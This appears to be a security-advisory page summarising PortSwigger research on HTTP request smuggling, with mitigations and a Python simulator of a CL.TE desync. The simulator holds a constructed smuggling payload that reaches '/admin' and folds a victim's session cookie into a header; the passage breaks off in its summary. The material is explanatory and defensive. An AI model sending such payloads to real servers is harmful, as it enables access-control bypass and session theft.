Tags: vulnerability, high, HTTP Request Smuggling, Web Vulnerability

Aug 06, 2025 • PortSwigger Research

HTTP/1.1 Must Die: What This Means for Bug Bounty Hunters

Source: PortSwigger Research
Category: vulnerability
Severity: high

Executive Summary

During Black Hat USA and DEFCON 2025, PortSwigger's Director of Research, James Kettle, highlighted the persistent and evolving nature of HTTP request smuggling. Despite years of defensive effort, the attack class remains a critical threat to web infrastructure because HTTP/1.1 message framing still lets two hops disagree about where one request ends and the next begins: a front-end and a back-end can honour different length headers (Content-Length versus Transfer-Encoding) or tolerate different malformed variants of them. Once the connection is desynchronized, an attacker can bypass front-end security controls, poison web caches, and capture other users' requests, including their credentials and session cookies, on the shared back-end connection. Organizations should audit their web servers, reverse proxies and load balancers for parsing discrepancies between hops. Mitigation strategies include enforcing strict HTTP parsing (rejecting requests that carry both Content-Length and Transfer-Encoding, or a malformed header of either kind), using HTTP/2 end-to-end rather than downgrading to HTTP/1.1 at the back-end, and normalizing request framing at the edge before forwarding. Security teams and bug bounty hunters should monitor emerging smuggling techniques, since each new parser discrepancy reopens the same unauthorized-access and data-exfiltration risks.
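The desynchronization described above, as an added illustration that is not part of the PortSwigger talk or this page: a toy HTTP/1.1 framer that splits one byte stream under three policies. The "cl" policy models a lenient front-end that trusts Content-Length, the "te" policy models an RFC-compliant back-end that trusts Transfer-Encoding, and the "strict" policy refuses the ambiguity. The attacker and victim requests, the hostname example.test and the header name X-Ignore are all constructed for the example.

```python
"""Toy HTTP/1.1 framer showing a CL.TE desync: a front-end that honours
Content-Length and a back-end that honours Transfer-Encoding split the same
bytes into different requests. All traffic below is constructed sample input."""
from __future__ import annotations

CRLF = b"\r\n"


class AmbiguousRequest(ValueError):
    """Strict policy: the request carries both Content-Length and Transfer-Encoding."""


def parse_head(head: bytes) -> tuple[str, dict[str, str]]:
    """Split a request head into (request line, lowercased header map)."""
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return lines[0].decode(), headers


def read_chunked(data: bytes) -> tuple[bytes, bytes]:
    """Decode a chunked body (no trailers); return (body, bytes after the terminator)."""
    out, pos = b"", 0
    while True:
        end = data.index(CRLF, pos)
        size = int(data[pos:end].split(b";")[0], 16)
        pos = end + 2
        if size == 0:
            if data[pos:pos + 2] != CRLF:
                raise ValueError("missing CRLF after last chunk")
            return out, data[pos + 2:]
        out += data[pos:pos + size]
        pos += size + 2  # chunk data plus its trailing CRLF


def frame(stream: bytes, policy: str) -> list[dict]:
    """Frame a byte stream into requests under one framing policy:
    'cl'     honour Content-Length, ignore Transfer-Encoding (lenient front-end)
    'te'     honour Transfer-Encoding when present (RFC 9112 back-end)
    'strict' refuse a request that carries both headers
    A trailing fragment without a complete head is returned with complete=False."""
    requests, rest = [], stream
    while rest:
        sep = rest.find(CRLF + CRLF)
        if sep < 0:  # partial request left waiting on the connection
            requests.append({"line": rest.decode(errors="replace"), "headers": {},
                             "body": b"", "complete": False})
            break
        head, rest = rest[:sep], rest[sep + 4:]
        line, headers = parse_head(head)
        has_cl, has_te = "content-length" in headers, "transfer-encoding" in headers
        if policy == "strict" and has_cl and has_te:
            raise AmbiguousRequest(line)
        if has_te and policy != "cl":
            body, rest = read_chunked(rest)
        elif has_cl:
            n = int(headers["content-length"])
            body, rest = rest[:n], rest[n:]
        else:
            body = b""
        requests.append({"line": line, "headers": headers, "body": body, "complete": True})
    return requests


# Constructed attacker request: a chunked terminator followed by a smuggled prefix,
# with Content-Length sized to cover both so the front-end forwards everything.
SMUGGLED_PREFIX = b"GET /admin HTTP/1.1\r\nX-Ignore: "
ATTACKER_BODY = b"0\r\n\r\n" + SMUGGLED_PREFIX
ATTACKER_REQUEST = (
    b"POST / HTTP/1.1\r\nHost: example.test\r\n"
    + b"Content-Length: " + str(len(ATTACKER_BODY)).encode() + b"\r\n"
    + b"Transfer-Encoding: chunked\r\n\r\n" + ATTACKER_BODY
)
# Constructed victim request arriving next on the same reused back-end connection.
VICTIM_REQUEST = b"GET /account HTTP/1.1\r\nHost: example.test\r\nCookie: session=victim\r\n\r\n"
STREAM = ATTACKER_REQUEST + VICTIM_REQUEST


def frontend_view() -> list[str]:
    """Request lines a Content-Length front-end believes it forwarded."""
    return [r["line"] for r in frame(STREAM, "cl")]


def backend_view() -> list[dict]:
    """Requests a chunked back-end actually executes: the victim's request line
    and cookie end up inside the X-Ignore header of the smuggled GET /admin."""
    return frame(STREAM, "te")


def strict_rejects() -> bool:
    """True if the strict policy refuses the ambiguous attacker request."""
    try:
        frame(STREAM, "strict")
    except AmbiguousRequest:
        return True
    return False


if __name__ == "__main__":
    print("front-end sees:", frontend_view())
    print("back-end sees: ", [r["line"] for r in backend_view()])
    print("strict parser rejects:", strict_rejects())
```

The front-end forwards what it believes are two benign requests (POST / and the victim's GET /account), while the back-end, having ended the first body at the chunked terminator, executes GET /admin with the victim's request line and session cookie folded into X-Ignore. The strict policy raises on the first request, which is the behaviour to look for when auditing a proxy or load balancer for parsing discrepancies.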

Summary

At Black Hat USA and DEFCON 2025, PortSwigger's Director of Research, James Kettle, issued a stark warning: request smuggling isn't dying out, it's evolving and thriving. Despite years of defensive ef
